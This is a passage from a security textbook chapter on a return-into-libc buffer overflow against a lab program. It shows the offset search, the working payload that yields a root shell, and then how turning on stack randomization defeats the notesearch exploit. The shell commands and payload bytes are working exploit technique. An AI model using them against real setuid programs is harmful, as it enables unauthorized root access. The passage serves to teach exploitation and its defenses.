Graphics Programs Reference
In-Depth Information
A quick binary search shows that the return address is probably over-
written by the eighth word of the program input, so seven words of dummy
data are used for spacing in the exploit.
reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x5')
reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x10')
Segmentation fault
reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x8')
Segmentation fault
reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x7')
Illegal instruction
reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x7 . "\x80\x0d\xed\xb7FAKE\x5b\xfe\
xff\xbf"')
sh-3.2# whoami
root
sh-3.2#
The exploit can be expanded upon by making chained libc calls, if
needed. The return address of
FAKE
used in the example can be changed to
direct program execution. Additional libc calls can be made, or execution
can be directed into some other useful section in the program's existing
instructions.
0x6c0
Randomized Stack Space
Another protective countermeasure tries a slightly different approach. Instead
of preventing execution on the stack, this countermeasure randomizes the
stack memory layout. When the memory layout is randomized, the attacker
won't be able to return execution into waiting shellcode, since he won't know
where it is.
This countermeasure has been enabled by default in the Linux kernel
since 2.6.12, but this topic's LiveCD has been configured with it turned off.
To turn this protection on again, echo
1
to the /proc filesystem as shown
below.
reader@hacking:~/booksrc $ sudo su -
root@hacking:~ # echo 1 > /proc/sys/kernel/randomize_va_space
root@hacking:~ # exit
logout
reader@hacking:~/booksrc $ gcc exploit_notesearch.c
reader@hacking:~/booksrc $ ./a.out
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]-------
reader@hacking:~/booksrc $
With this countermeasure turned on, the notesearch exploit no longer
works, since the layout of the stack is randomized. Every time a program
starts, the stack begins at a random location. The following example demon-
strates this.
